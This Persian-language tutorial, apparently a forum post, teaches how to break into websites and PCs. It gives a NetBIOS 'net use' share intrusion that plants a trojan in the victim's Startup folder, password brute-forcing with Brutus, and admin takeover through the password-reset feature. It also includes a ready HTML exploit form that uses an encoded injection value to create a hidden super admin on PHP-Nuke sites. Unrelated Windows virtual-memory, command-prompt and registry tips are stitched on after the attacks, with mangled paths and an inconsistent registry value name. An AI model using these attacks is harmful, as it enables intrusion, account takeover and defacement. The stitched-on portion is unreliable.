سلام دوستان
امیدوارم از این آموزش سو استفاده نکنید
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا باید به سیستم طرف برای نصب تروجان نفوذ کنید و نت بایوس بهترین راه هست!
نفوذ به سیستم از طریق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \IPDriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \80.191.191.39c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
--------------------------------------------------------------------------------
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
--------------------------------------------------------------------------------
خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
Win9x
گام اول : بعد از مراجعه به منوی Start ابتدا روی گزینه Settings بعدش روی گزینه Control Panel کلیک کنین .
گام دوم : روی آیکون System دابل کلیک کنین .
گام سوم : روی زبونه Performance کلیک کنین .
گام چهارم : روی دکمه Virtual Memory کلیک کنین.
گام پنجم : گزینه زیر را فعال کنین :
گام ششم : ارزشهای حداقل و حداکثر حافظه مجازی رو یکسان کنین . بهترین شیوه تنظیم، به سخت افزار شما و مقدار حافظه ای که نصب کردین ، بستگی داره . اما توصیه می شه ، حداقل 16 مگابایت و حداکثر دو برابر ظرفیت حافظه فیزیکی رو انتخاب کنین . نکته مهم اینه که هر دو ارزش ، به یه میزانن .
Win2k
گام اول : پس از مراجعه به منویStart ، ابتدا روی گزینه Settings بعدش روی گزینه Control Panel کلیک کنین .
گام دوم : روی آیکون System دابل کلیک کنین .
گام سوم : روی زبونه Advanced کلیک کنین .
گام چهارم : روی دکمه Performance Options کلیک کنین.
گام پنجم : تو کادر محاوره ایVirtual Memory Setting ، روی دکمه Change کلیک کنین .
گام ششم : درایوی که می خواید Swap file رو روی اون قرار بدید ، انتخاب کنین .
گام هفتم : برای فیلدهای Initial Sizeو Maximum Size مقدارای یکسانی وارد کنین.
گام هشتم : بعد از راهاندازی مجدد سیستم Swap file ، تو درایو مربوطه با حجم مورد نظر ایجاد می شه .
Windows XP
گام اول : بعد از مراجعه به منویStart ، گزینه Control Panel رو انتخاب کنین .
گام دوم : روی آیکون System دابل کلیک کنین .
گام سوم : روی زبونه Advanced کلیک کرده و تو بخش Performance روی دکمه Settings کلیک کنین .
گام چهارم : روی زبونه Advanced کلیک کرده و تو بخش Virtual Memory روی Change کلیک کنین .
گام پنجم : درایوی که می خواید حافظه مجازی رو روی اون قرار بدید ، انتخاب کنین بعد از تنظیم ارزش هر درایو ، باید روی دکمه SET کلیک کنین . اگر فقط یه مقدار رو تایپ کرده و درایو بعدی رو هایلایت کنین ، تنظیمات اولین درایو ذخیره نمی شن.
گام ششم : برای فیلدهای Initial size وMaximum size ، مقادیر یکسانی وارد کنین .
گام هفتم : ابتدا SET و بعدش OK رو کلیک کرده و سیستم رو دوباره راه اندازی کنین تا تنظیمات جدید، وارد شن .
اجرای برنامه Command Prompt به چند طریق است :
1-عبارت cmd را در Run تایپ کنید یا :
2-Start MenuProgramsAccessories Command Prompt
مهمترین دستورات عبارتند از :
1- DriverQuery : نشان دادن لیستی از تمام درایورهای ( راه اندازها ) نصب شده روی سیستم .
2- DiskPart : انجام پارتیشن بندی دیسک
3- Defrag : انجام عمل یکپارچه سازی دیسک سخت
4-Ipconfig : نمایش جزئیات پیکر بندی IP
5-PageFileConfig : تنظیم حافظه مجازی
6- SystemInfo : نمایش اطلاعات سیستم
7- Bootcfg : نمایش محتویات Boot.ini
8-TaskList : فهرست وظایف
9-HostName : دریافت نام میزبان
10-Netstat : پیاده سازی Tcp / IP برای Netstat
11-rsh : پیاده سازی Tcp / IP Rsh
12-rcp پیاده سازی Tcp / IP Rcp
با یک ترفند بسیار ساده دوستان عزیز می توانند هر یک از درایوهای موجود در سیستم خود را ناپدید کنند البته لازم است برای انجام این کار از رجیستری کمک بگیرید. ابتدا به کمک دستور regedit رجیستری خود را باز نمایید Start -- > Run -- > را تایپ کنید regedit سپس در پنجره سمت چپ به این کلید مراجعه کنید : HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer و یک متغیر جدید از نوع DWORD ساخته و نام آن را NoDrivers بگذارید . برای اینکار در قسمت سفید و خالی پنجره سمت راست راست کلیک کرده New سپس DWORD VALUE را انتخاب نمائید پس از آن نام آنرا NoDrivers بگذارید . ( دقت کنید حروف بزرگ و کوچک در رجیستری بسیار مهم بوده و باید دقیق تایپ شوند بهترین راه جهت جلوگیری از هرگونه اشتباهی کپی کردن اسامی است ) بر روی NoDrivers دابل کلیک کنید و Value Data آنرا اعداد زیر بگذارید . مقداری که برای این متغیر تعیین می کنید نشان می دهد که چه درایوی از سیستم باید مخفی شود.اعداد به ترتیب خود درایوها به مرور 2 برابر میشوند . مثلا برای مخفی کردن هر درایو یا چند درایو می توانید از اعداد زیر استفاده کنید مثل : A:1 , B:2 , c:4 , D:8 , E:16 , F:32 و........... برای ناپدید کردن تمام درایوها می توانید عدد دسیمال ۶۷۱۰۸۸۶۳ را به متغیر NoDrives بدهید . نکته : برای ظاهر شدن مجدد درایو به همان مسیر قبلی در رجیستری رفته و مقدار NoDrives را خالی بگذارید. با استفاده از این روش به سادگی می توانید بدون استفاده از هیچ برنامه ای هر درایو را که مایل باشید از MY COMPUTER حذف نمایید . دقت کنید اگر بر روی سیستم خود از چند ویندوز استفاده میکنید و قصد دارید درایوها را در تمامی آنها حذف نمائید این عمل را باید برای تک تک آنها تکرار نمائید .